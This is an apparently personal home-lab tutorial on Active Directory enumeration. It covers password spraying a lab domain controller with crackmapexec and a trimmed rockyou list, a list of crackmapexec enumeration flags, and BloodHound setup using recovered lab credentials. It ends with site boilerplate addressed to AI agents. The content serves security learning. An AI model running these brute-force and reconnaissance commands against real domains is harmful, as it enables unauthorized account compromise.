# Active Directory Lab Setup \[ AD Enumeration ] - 103
## `BRUTEFORCING DOMAIN PASSWORDS`
For BRUTEFORCING DOMAIN PASSWORDS we need our own kali linux.
Please install Kali Linux for VMware by watching some Youtube Videos. or Some other Documentations. my suggesstions:
{% embed url="" %}
Lets Start our Bruteforcings :thumbsup:
We need our Users for bruteforce . Lets Copy all the users from DC01 to our Kali
> Kali TIPS : Ihave my own [kali repository in my github](https://github.com/akuma-log/My-Kali). so you can build zsh shell verry fastasticlly, and setup your tmux very nicely. i always use TMUX . I love TMUX 😘
>
> Preinstallations: Sublime Text
After Copy the usernames from DC01 then make a file in our Kali linux
```
We can see that every user have a lot of spaces on them.
To achieve removing spaces from words and placing each word on a new line using Vim, you
can follow these steps:
```
* **Open the file in Vim:**
```bash
vim filename.txt
```
* **Enter Normal Mode:** Press `Esc` to ensure you are in Normal mode.
* **Remove spaces and put each word on a new line:** You can use the following Vim command in Normal mode:
```vim
:%s/ \+/\r/g
```
By following these steps, all spaces between words will be removed, and each word will be placed on a new line.
Then just remove `'Administrator , Guest , Krbtgt'` user from the list. We only are going to work with normal users now.
### `Customize Rockyou.txt`
Lets first Unzip the the Rockyou.txt.gz file from our /usr/share/wordlists directory :
`rockyou.txt` file are too big . its almost 14M lines `wc-l` commands show the how many lines are in rockyou.txt file . So i just cut first 1000 passwords by typing the `head` commnad .
Lets confirm that we can ping our DC01 or not (so we can)
### `Enumeration`
nmap scan
After running the nmap scan we can see Some of the Ports are running . These are the default ports are AD are running in a Windows Hosts. \[try to be Remember please]
Next Lets try to login with a user in Our WS01 then remember the IP address. Do nmap scan:
We can see that there are no smb running up. Lets use another tools for this enumeration . Use multple tools is best practice for Enumeration.
### Lets Use Crackmapexec
```
> crackmapexec smb 10.10.0.100
SMB 10.10.0.100 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:xyz.com) (signing:True) (SMBv1:False)
```
DC01 is valid but lets try with fake login credentials.
STATUS\_LOGON\_FAILURE is the credentials is not valid for DC01. Lets make some changes.
```
└─ ⚔ crackmapexec smb targets.txt -u user.txt -p passwords.txt
```
After run this command we got a valid hit.
If You run it i think you got the same user all the time. But the question is how can we bruteforce the other users here.
```
└─ ⚔ crackmapexec smb targets.txt -u user.txt -p passwords.txt --continue-on-success | grep '[+]'
```
Its gonna take some time so `Seat Back relax and ENJOY 😁`
`We can do a lot of things with CrackmapExec. For enumeration:`
### `CrackMapExec Enumeration Keywords and Commands`
1. **Enumerate Users**
```sh
crackmapexec smb -u -p --users
```
2. **Enumerate Groups**
```sh
crackmapexec smb -u -p --groups
```
3. **Enumerate Shares**
```sh
crackmapexec smb -u -p --shares
```
4. **Enumerate Sessions**
```sh
crackmapexec smb -u -p --sessions
```
5. **Enumerate Logged On Users**
```sh
crackmapexec smb -u -p --loggedon-users
```
6. **Enumerate Domain Info**
```sh
crackmapexec smb -u -p --domain
```
7. **Enumerate Password Policy**
```sh
crackmapexec smb -u -p --pass-pol
```
8. **Enumerate LAPS Passwords**
```sh
crackmapexec smb -u -p --laps
```
9. **Enumerate Active Directory Information**
```sh
crackmapexec ldap -u -p --enum
```
10. **Enumerate Domain Controllers**
```sh
crackmapexec ldap -u -p --dc
```
11. **Enumerate Domain Trusts**
```sh
crackmapexec ldap -u -p --trusted-for
```
12. **Enumerate ACLs**
```sh
crackmapexec smb -u -p --lsa
```
13. **Enumerate Group Policy Objects (GPOs)**
```sh
crackmapexec ldap -u -p --gpos
```
14. **Enumerate Delegations**
```sh
crackmapexec ldap -u -p --delegation
```
15. **Enumerate Computers**
```sh
crackmapexec ldap -u -p --computers
```
## `BLOODHOUND Domain Enumeration`
Another Greate tool for Enumerate AD is BLOODHOUND. There is no other alternative of BLOODHOUND 😁
Lets download Bloodhound
{% embed url="" %}
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.
Bloodhound have its own [Documentation](https://bloodhound.readthedocs.io/en/latest/index.html) . (Feel free to read)
Lets [download the bloodhound](https://bloodhound.readthedocs.io/en/latest/installation/linux.html) form their docs.
running Bloodhound
I setup bloodhound in my opt directory.
### `Setup a password for Bloodhound :`
After opening the Bloodhound we are gonna give neo4j deafult credentials '`neo4j:neo4j`' and its gonna request us for to setup a new passwords.
requesting for password setup
visit `localhost:7474` then give the default credentials `neo4j:neo4j` then new password request promt are gonna open and set this up.
`Reset Bloodhound Credentials`
You can reset the password via :
```
> locate neo4j | grep auth
/usr/share/neo4j/data/dbms/auth
//just delete the file and start neo4j again. its gonne ask us to changee the default
creds again.
```
after going to the bloohound its gonna ask us to give some data . So we have to give some data here.
in The bruteforce passwords sections we got some smb credentials hits right?
i just copied everything into creds.txt . lets extract our credentials
* **Open the file in Vim:**
```sh
vim creds.txt
```
* **Enter Normal Mode:** Press `Esc` to ensure you are in Normal mode.
* **Run the substitution command:** Use the following command to transform each line:
```vim
:%s/.*\\\([^\\:]*\):\([^\\:]*\)/\1:\2/
```
By following these steps, you will transform each line from the format `"SMB 10.10.0.100 445 DC1 [+] xyz.com\abutler:softball"` to the desired `username:password` format like `abutler:softball`.
we have the credentials. now we have to do upload some in bloohound gui application.
`Bloodhound have python version of it .`
{% embed url="" %}
we can simply install by ruuning `pip install bloodhound`
Lets do some changes. Lets add `10.10.0.100 dc1.xyz.com` to our `/etc/hosts`
and then change our nameserver from `/etc/resolve.conf` file to this `nameserver 10.10.0.100`
Lets run Bloodhound-python
* **`bloodhound-python`**: Tool for collecting AD data.
* **`-u abutler`**: Username for authentication.
* **`-p softball`**: Password for the specified user.
* **`-dc dc1.xyz.com`**: Domain controller to connect to.
* **`--disable-autogc`**: Disables automatic garbage collection.
* **`-d xyz.com`**: Specifies the AD domain
By run ls we found some file
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://akuma-s.gitbook.io/akuma/projects/home-lab/home-lab-blogs-or-active-directory/active-directory-lab-setup-ad-enumeration-103.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.